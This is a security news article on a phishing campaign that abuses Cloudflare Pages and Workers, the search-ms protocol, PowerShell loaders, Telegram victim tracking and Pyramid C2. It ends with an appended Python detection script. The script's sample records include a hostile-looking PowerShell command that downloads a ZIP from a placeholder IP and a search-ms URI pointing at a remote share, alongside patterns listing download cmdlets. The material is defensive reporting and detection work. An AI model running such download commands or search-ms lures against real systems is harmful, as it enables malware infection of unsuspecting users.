Cloudflare Abused by Hackers for Sophisticated Phishing Campaigns

In a concerning development, cybersecurity researchers have uncovered a sophisticated phishing campaign orchestrated by a Russian-speaking threat actor.

The operation leverages Cloudflare’s Pages and Workers services to deploy phishing pages disguised as legitimate DMCA (Digital Millennium Copyright Act) takedown notices.

These pages trick victims into downloading malicious files, initiating a complex infection chain that includes Telegram-based victim tracking and Pyramid Command-and-Control (C2) infrastructure.

[Image: Example phishing page.]

Phishing Tactics and Infrastructure

The phishing campaign employs lures hosted on domains ending in “pages.dev” and “workers.dev,” services typically used for legitimate purposes like static website hosting and serverless JavaScript execution.

The attackers use these platforms to impersonate secure document-sharing services, targeting individuals with DMCA-themed notices.

Victims are directed to download files via the “search-ms” protocol, which opens a Windows Explorer window to retrieve malicious content disguised as legitimate documents.

The infection chain begins with a Windows shortcut (.lnk) file masquerading as a PDF.

Once executed, the shortcut triggers a PowerShell script that downloads a ZIP archive containing both legitimate and malicious files.

The payload includes a Python script configured to communicate with Pyramid C2 servers, enabling attackers to control infected systems remotely.

Researchers identified over 20 domains connected to this infrastructure, many of which reused file names while altering their contents.

The malicious servers were hosted on networks such as Railnet LLC, exposing open directories that facilitated the delivery of staged payloads.

Telegram Integration for Victim Tracking

A notable evolution in the attackers’ tactics is the integration of Telegram for victim tracking.

The PowerShell script “kozlina2.ps1” uses hardcoded Telegram bot credentials to send infected hosts’ IP addresses to the attackers via the Telegram Bot API.

This data is collected using external services like ip-api.com before being transmitted to the attackers’ Telegram channel, titled “ПШ КОД ЗАПУСК” (“PS CODE LAUNCH”).

[Image: Screenshot from Telegram of the group tied to the malicious phishing attack.]

Researchers were able to gather limited details about the operators behind this channel, identifying accounts such as @tyyndrabot (used for receiving IP addresses), @pups2131 (the administrator), and Skandi (a group member whose role remains unclear).

The campaign also demonstrates incremental advancements in obfuscation techniques.

For instance, the Python script “kursor.py,” which facilitates communication with Pyramid C2 servers, now includes additional junk characters in its configuration strings before decoding begins.

While this technique does not significantly complicate analysis, it reflects ongoing efforts by the threat actor to evade detection and frustrate cybersecurity defenses.

This campaign underscores the growing abuse of trusted services like Cloudflare and Telegram by cybercriminals seeking to mask early-stage malicious activity.

The use of legitimate system interfaces such as “search-ms” further complicates detection in environments where protocol handlers are not actively monitored or restricted.

Cybersecurity experts recommend vigilance in monitoring for abuse of protocol handlers like “search-ms,” tracking open directories serving malicious payloads, and scrutinizing trusted services exploited for phishing campaigns.
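As an added illustration of the first recommendation (not code from the article or from the researchers), the script below scans process-creation records for two behaviours the story describes: a search-ms: URI whose crumb=location: parameter points at a remote UNC path or URL instead of a local folder, and a PowerShell command line that downloads a ZIP archive. The sample records, the alert names and the download-cmdlet list are my own constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample process-creation records (image, command line), modelled on
# Sysmon Event ID 1 / Windows 4688 fields. They are not from the campaign itself.
SAMPLE_EVENTS = [
    ("explorer.exe", r"explorer.exe search-ms:query=Notice&crumb=location:\\203.0.113.10\share&displayname=Documents"),
    ("explorer.exe", r"explorer.exe search-ms:query=report&crumb=location:C:\Users\alice\Documents"),
    ("powershell.exe", r'powershell.exe -w hidden -c "Invoke-WebRequest http://203.0.113.10/p.zip -OutFile $env:TEMP\p.zip"'),
    ("powershell.exe", r"powershell.exe -File C:\scripts\backup.ps1"),
]

# A search-ms: URI anywhere in the command line (stop at whitespace or a quote).
SEARCH_MS = re.compile(r"search-ms:[^\s\"']+", re.IGNORECASE)
# The documented crumb=location: parameter pointing at a UNC path or URL rather
# than a local folder; a local search is normal, a remote one is what a lure needs.
REMOTE_LOCATION = re.compile(r"crumb=location:(\\\\|https?://|file://)", re.IGNORECASE)
# Download primitives commonly seen in a first-stage PowerShell script (assumed list).
DOWNLOAD_CMDLET = re.compile(
    r"\b(Invoke-WebRequest|iwr|DownloadFile|DownloadString|Start-BitsTransfer|curl|wget)\b",
    re.IGNORECASE,
)


def classify(image, cmdline):
    """Return the alert tags (hypothetical names) raised by one record."""
    alerts = []
    m = SEARCH_MS.search(cmdline)
    # Browser-launched URIs are often percent-encoded, so decode before inspecting.
    if m and REMOTE_LOCATION.search(unquote(m.group(0))):
        alerts.append("search-ms_remote_location")
    if (image.lower().endswith("powershell.exe")
            and DOWNLOAD_CMDLET.search(cmdline)
            and ".zip" in cmdline.lower()):
        alerts.append("powershell_zip_download")
    return alerts


def scan(events):
    """Map the index of each suspicious record to its alert tags."""
    hits = {}
    for i, (image, cmdline) in enumerate(events):
        alerts = classify(image, cmdline)
        if alerts:
            hits[i] = alerts
    return hits


if __name__ == "__main__":
    for i, tags in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i][0], tags)
```

Both rules are heuristics and will need tuning against your own baseline of legitimate search-ms use and PowerShell downloads.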

As threat actors continue to refine their tactics, defenders must revisit known methods and infrastructure over time to stay ahead of evolving threats.

This discovery highlights the importance of proactive threat hunting and robust cybersecurity measures to mitigate risks posed by increasingly sophisticated phishing campaigns targeting unsuspecting users worldwide.

Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.